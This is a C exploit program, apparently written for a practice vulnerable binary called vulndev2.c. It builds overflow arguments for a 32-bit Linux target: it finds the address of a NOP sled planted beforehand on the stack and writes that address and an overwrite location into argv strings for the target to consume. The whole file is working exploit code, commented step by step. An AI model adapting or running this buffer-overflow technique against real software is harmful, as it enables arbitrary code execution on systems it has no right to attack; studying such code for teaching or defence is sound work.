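/*
 * exploit for vulndev2.c
 * easy peasy
 * -ex0 @ cpimps
 *
 * Builds the two argv strings handed to the target and prints them on
 * stdout, separated by a space, for the caller to pick up (e.g. via
 * command substitution):
 *
 *   arg1 - BSIZE bytes of filler, then the overwrite location
 *          (retloc - 2, little-endian) at offset BSIZE + skip,
 *          padded with filler to ARG1_LEN bytes.
 *   arg2 - the address of the first run of four NOP bytes (0x90) found
 *          on this process's own stack above the current stack pointer;
 *          the caller is expected to have planted a NOP-padded payload
 *          there beforehand (presumably through the environment).
 *
 * All of this assumes a 32-bit Linux process: 4-byte addresses and a
 * user stack that ends at 0xbfffffff.  On any other target the
 * constants below are meaningless.
 */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Store the low 32 bits of val at addr, least significant byte first,
 * one byte at a time (addr need not be aligned).  Both arguments are
 * evaluated exactly once.
 */
#define PUT_ADDR(addr, val) do { \
    unsigned char *pa_ = (unsigned char *)(addr); \
    unsigned long pv_ = (unsigned long)(val); \
    pa_[0] = (unsigned char)(pv_ & 0xff); \
    pa_[1] = (unsigned char)((pv_ >> 8) & 0xff); \
    pa_[2] = (unsigned char)((pv_ >> 16) & 0xff); \
    pa_[3] = (unsigned char)((pv_ >> 24) & 0xff); \
} while (0)

/* Bytes of filler before the planted address. */
#define BSIZE 90
/* Total bytes emitted for arg1 (the original sized its buffer BSIZE + 8). */
#define ARG1_LEN (BSIZE + 8)
/* Width of a planted address: an i386 pointer. */
#define ADDR_LEN 4
/* Largest skip that keeps the 4 address bytes inside arg1. */
#define MAX_SKIP (ARG1_LEN - BSIZE - ADDR_LEN)
/* First address the NOP scan must not touch (top of the i386 user stack). */
#define STACK_TOP ((const char *)0xbfffffff)

unsigned long get_sp(void);

/*
 * argv[1]: retloc, hexadecimal (with or without "0x"); the address whose
 *          low bytes the target is expected to overwrite.  What is planted
 *          is retloc - 2.
 * argv[2]: skip, decimal, optional (default 0); extra offset of the
 *          planted address inside arg1.  Must be in 0..MAX_SKIP.
 *
 * Returns 0 after printing "arg1 arg2\n" on stdout; any error is
 * reported on stderr and exits with EXIT_FAILURE.
 */
int main(int argc, char *argv[])
{
    char arg1[ARG1_LEN + 1];   /* +1: printf("%s") needs a terminator */
    char arg2[8];
    const char *p;
    char *end;
    unsigned long retloc;
    unsigned long retaddr;
    long skip = 0;
    int found = 0;

    if (argc < 2) {
        fprintf(stderr, "usage: %s <retloc> [skip]\n", argv[0]);
        return EXIT_FAILURE;
    }

    errno = 0;
    retloc = strtoul(argv[1], &end, 16);
    if (end == argv[1] || *end != '\0' || errno == ERANGE) {
        fprintf(stderr, "bad retloc '%s': expected a hexadecimal address\n", argv[1]);
        return EXIT_FAILURE;
    }

    if (argc > 2) {
        errno = 0;
        skip = strtol(argv[2], &end, 10);
        if (end == argv[2] || *end != '\0' || errno == ERANGE) {
            fprintf(stderr, "bad skip '%s': expected a decimal number\n", argv[2]);
            return EXIT_FAILURE;
        }
        /* The address is written at arg1 + BSIZE + skip; keep it inside arg1. */
        if (skip < 0 || skip > MAX_SKIP) {
            fprintf(stderr, "skip must be between 0 and %d\n", MAX_SKIP);
            return EXIT_FAILURE;
        }
        fprintf(stderr, "skipping %ld bytes\n", skip);
    }

    /*
     * lame: walk our own stack upwards from the current stack pointer
     * until four consecutive NOP bytes appear.  Nothing guarantees the
     * whole range is mapped; an unmapped gap below STACK_TOP faults.
     */
    for (p = (const char *)get_sp(); p + ADDR_LEN <= STACK_TOP; p++) {
        if (memcmp(p, "\x90\x90\x90\x90", ADDR_LEN) == 0) {
            found = 1;
            break;
        }
    }
    if (!found) {
        fprintf(stderr, "load shellcode into memory first! (remember to pad with some nops)\n");
        return EXIT_FAILURE;
    }
    retaddr = (unsigned long)p;

    fprintf(stderr, "using retloc: 0x%lx - retaddr: 0x%lx\n", retloc, retaddr);

    /* arg1: filler, the overwrite location at BSIZE + skip, filler, NUL. */
    memset(arg1, 'A', ARG1_LEN);
    arg1[ARG1_LEN] = '\0';
    PUT_ADDR(arg1 + BSIZE + skip, retloc - 2);

    /* arg2: the sled address followed by zeros, which also terminate it. */
    memset(arg2, 0x00, sizeof(arg2));
    PUT_ADDR(arg2, retaddr);

    /*
     * Both strings travel through argv, so a NUL inside either planted
     * address truncates it here (and would in the target's argv too).
     */
    if (strlen(arg1) != ARG1_LEN || strlen(arg2) != ADDR_LEN) {
        fprintf(stderr, "warning: a planted address contains a NUL byte; it will be truncated\n");
    }

    fprintf(stderr, "exploitation buffer ready\n");
    printf("%s %s\n", arg1, arg2);
    return 0;
}

/*
 * Return the current stack pointer; main() uses it as the lower bound of
 * the NOP scan.  i386-specific: it reads %esp.  Built for x86-64 this
 * still assembles but yields only the low 32 bits of %rsp, which is not
 * a usable address there.
 */
unsigned long get_sp(void)
{
    unsigned int sp;

    __asm__ __volatile__ ("movl %%esp, %0" : "=r" (sp));
    return sp;
}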